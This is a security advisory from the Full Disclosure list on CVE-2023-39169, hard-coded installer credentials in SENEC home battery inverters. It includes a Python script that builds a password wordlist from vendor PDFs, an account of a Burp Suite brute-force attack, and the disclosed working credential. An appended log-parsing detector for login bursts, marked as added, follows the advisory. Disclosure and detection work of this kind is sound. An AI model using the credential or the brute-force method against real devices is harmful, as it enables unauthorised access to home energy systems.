
List:       full-disclosure
Subject:    [FD]  Senec Inverters Home V1, V2, V3 Home & Hybrid Use of Hard-coded Credentials - CVE-2023-39169
From:       Phos4Me via Fulldisclosure <fulldisclosure () seclists ! org>
Date:       2023-11-13 10:50:12
Message-ID: dI8TM_hYbf_97gyICJ8zJA-B6mMJUthVZQeHfVYlelXgdNiHs4iHY337okSJ_F-o6esqDc8zx8JGHtv1emx_6sF6Dv_qpeyrD43hWau4ERo= () proton ! me

> > Advisory ID: Ph0s-2023-003
> > Product: EnBw - SENEC legacy storage box: V1-V3
> > Manufacturer: SENEC - a part of EnBw
> > Affected Version(s): Firmware: all (as of 2023-06-19)
> > Tested Version(s): current
> > Vulnerability Type: CWE-307: Improper Restriction of Excessive Authentication Attempts
> > CWE-798: Use of Hard-coded Credentials
> > 

> > Risk Level:
> > CVSS v3.1 Vector:
> > AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H (9.8 Critical)
> > 

> > Manufacturer Risk Level Rating:
> > AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L/E:H/RL:U/RC:C
> > Overall CVSS Score: 8.6
> > 

> > Solution Status: Fixed
> > Manufacturer Notification: 2023-06-05
> > Public Disclosure: 2023-11-01
> > CVE Reference: CVE-2023-39169
> > Author of Advisory: Ph0s[4], R0ckE7
> > 

> > ********************************************************************************
> > 

> > Overview:
> > Foreword:
> > This vulnerability was reported to the enbw-cert. We would like to
> > thank enbw-cert for taking care of the vulns and patching the systems.
> > We decided to publish when most of the reported vulns are patched
> > to make sure nobody is harmed when 3rd parties exploit the mentioned vulns.
> > 

> > About Senec:
> > We are SENEC
> > 

> > We have been the EnBW energy independence experts since 2018 – but we have
> > put our heart and soul into guiding customers on the route to independence
> > since SENEC was founded in 2009. Our passion lies in actively promoting the
> > energy transition with innovative ideas and pioneering products. And,
> > because we don't do things by halves, our unwavering ambition is to create
> > integrated solutions that enable you to enjoy the highest possible degree
> > of independence and sustainability through self-generation of solar
> > electricity.
> > 

> > About SENEC Home:
> > 

> > SENEC.Home: The smart electricity storage device for your home
> > 

> > SENEC.Home is the heart of your sustainable, affordable supply of solar
> > electricity. The smart battery storage device stores excess electricity
> > generated by your PV system so that you can use it when you need it – such as
> > when your household's energy consumption rises in the evening, or on rainy days
> > when your PV system generates less power.
> > 

> > ********************************************************************************
> > 

> > Vulnerability Details:
> > 

> > Based on the previously identified hard-coded username in CVE-2023-39167 and
> > CVE-2023-39168 all technical requirements were met to target the password.
> > Since the username installateur is quite straightforward in the sense of
> > guessable, it was decided to perform a dictionary-type brute force attack.
> > For this purpose, all related PDF documents were downloaded to create a password
> > list specifically tailored to SENEC.Inverter.
> > Source of the Documents: https://senec.com/au/company/downloads
> > 

> > ********************************************************************************
> > 

> > Proof of Concept (PoC):
> > 

> > The attack consists of the following steps:
> > 

> > 1. parse the documents:
> > import argparse
> > import glob
> > import string
> > import fitz  # PyMuPDF
> > 

> > def get_senec_password(pdf_directory, pwd_prefix, pwd_suffix):
> >     # Collect the text of every PDF in the given directory
> >     pdf_text = ""
> >     for file in glob.glob(f"{pdf_directory}/*.pdf"):
> >         pdf = fitz.open(file)
> >         for page in pdf:
> >             pdf_text += page.get_text()
> > 

> >     # Unique alphanumeric words with surrounding punctuation stripped
> >     pdf_words = set(
> >         [word.strip(string.punctuation) for word in pdf_text.split() if word.strip(string.punctuation).isalnum()]
> >     )
> >     # Build {prefix}{word}{suffix} candidates, skipping purely numeric words
> >     senec_password = set(
> >         [f"{pwd_prefix}{word}{pwd_suffix}" for word in pdf_words if not word.isnumeric()]
> >     )
> > 

> >     with open("senec-password.txt", mode="w", encoding="utf-8") as fd:
> >         fd.write('\n'.join(senec_password))
> > 

> > if __name__ == '__main__':
> >     parser = argparse.ArgumentParser(description="Generate SENEC.Inverter password dictionary")
> >     parser.add_argument("-d", "--pdf-directory", type=str, action="store", default="pdf", required=False,
> >                         help="pdf storage location")
> >     parser.add_argument("-p", "--pwd-prefix", type=str, action="store", default="Senec", required=False,
> >                         help="password prefix")
> >     parser.add_argument("-s", "--pwd-suffix", type=str, action="store", default="", required=False,
> >                         help="password suffix")
> >     args = parser.parse_args()
> >     get_senec_password(args.pdf_directory, args.pwd_prefix, args.pwd_suffix)
> > 

> > 2. work with the output:
> > The Python script extracts all words from all PDF documents and allows adding a prefix
> > and/or suffix to generate passwords according to the pattern {prefix}{word}{suffix},
> > such as the following:
> > ***** cut *******
> > Senecmoribundity
> > SenecCleaning
> > Senecdusts
> > Senecclinical
> > Senecaggregation
> > Senecstubborn
> > Senecstorages
> > SenecDecommissioning
> > SenecInstall
> > Senecmany
> > ***** cut ********
> > 

> > 3. use the list within Burp Suite
> > The password lists were then used in Burp Suite Professional, a tool
> > specifically designed for web application security testing, to perform an
> > automated brute force attack.
> > The list shown above as an excerpt with the prefix Senec and no suffix was
> > finally successful in executing the attack.
> > It could be determined that the password "SenecInstall" is valid for all
> > SENEC.Inverter devices.
> > 

> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > 

> > Solution:
> > Patched by Manufacturer
> > (Rolled out until September 11, 2023)
> > 

> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > 

> > Disclosure Timeline:
> > 

> > 2022-06-01: Vulnerability discovered
> > 2023-06-05: Vulnerability reported to manufacturer
> > 2023-09-11: Patch rollout by manufacturer to affected devices
> > 2023-11-01: Public disclosure of vulnerability
> > 

> > ************************************************************************
> > 

> > Researcher:
> > Ph0s[4], R0ckE7
> > 

> > ************************************************************************
> > 

> > Disclaimer:
> > 

> > The information provided in this security advisory is provided "as is"
> > and without warranty of any kind. Details of this security advisory may
> > be updated in order to provide as accurate information as possible.
> > 

> > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> > 

> > Copyright:
> > 

> > Creative Commons - Attribution (by) - Version 4.0
> > URL: https://creativecommons.org/licenses/by/4.0/deed.en
> > _______________________________________________
> > Sent through the Full Disclosure mailing list
> > https://nmap.org/mailman/listinfo/fulldisclosure
> > Web Archives & RSS: https://seclists.org/fulldisclosure/
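The dictionary run described in the advisory only works because the device neither throttles nor locks out failed logins (CWE-307), so the burst of attempts against one account is the thing a defender can watch for. The following detector is an added example, not part of the advisory: it parses access-log lines, counts 401 responses per (source, username) in a sliding window, and marks when a later success from the same source follows a burst. The combined-log format, the `/login` path with a `user` query field, the status codes and the sample lines are all assumptions constructed for this example; the real SENEC device log format is not documented on this page.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed combined-log-style line for a POST to /login that carries the tried
# username as a query field (a construction; the real device log is not documented).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"POST /login\?user=(?P<user>[^ &"]+)[^"]*" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    # Returns (ip, user, status, timestamp) for a login attempt, else None.
    m = LOG_RE.match(line)
    if not m:
        return None
    return (m.group("ip"), m.group("user"), int(m.group("status")),
            datetime.strptime(m.group("ts"), TS_FMT))

def detect_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    # Flags (ip, user) pairs with >= threshold failures inside a sliding window
    # and records whether a later success from that pair followed.
    failures = defaultdict(deque)   # (ip, user) -> recent failure timestamps
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, user, status, ts = rec
        key = (ip, user)
        q = failures[key]
        while q and ts - q[0] > window:   # forget failures outside the window
            q.popleft()
        if status == 401:
            q.append(ts)
            if len(q) >= threshold:
                alerts.setdefault(key, {"first_alert": ts, "succeeded": False})
        elif status == 200 and key in alerts:
            alerts[key]["succeeded"] = True   # the guessed password worked
    return alerts

# Constructed sample: six failures for the installer account from one source in
# 30 s, then a success from that source, plus unrelated traffic.
SAMPLE_LOG = [
    f'203.0.113.5 - - [13/Nov/2023:10:50:{s:02d} +0000] "POST /login?user=installateur HTTP/1.1" 401 12'
    for s in (1, 7, 13, 19, 25, 31)
] + [
    '203.0.113.5 - - [13/Nov/2023:10:50:37 +0000] "POST /login?user=installateur HTTP/1.1" 200 842',
    '198.51.100.7 - - [13/Nov/2023:10:51:02 +0000] "POST /login?user=installateur HTTP/1.1" 200 842',
    '198.51.100.7 - - [13/Nov/2023:10:51:03 +0000] "GET /status HTTP/1.1" 200 310',
]

if __name__ == "__main__":
    for (ip, user), info in detect_bruteforce(SAMPLE_LOG).items():
        print(f"{ip} -> {user}: burst at {info['first_alert']:%H:%M:%S}, succeeded={info['succeeded']}")
```

A single legitimate login from the second source is not flagged; only the source that exceeded the failure threshold is reported, with the follow-up success marked as the higher-priority finding.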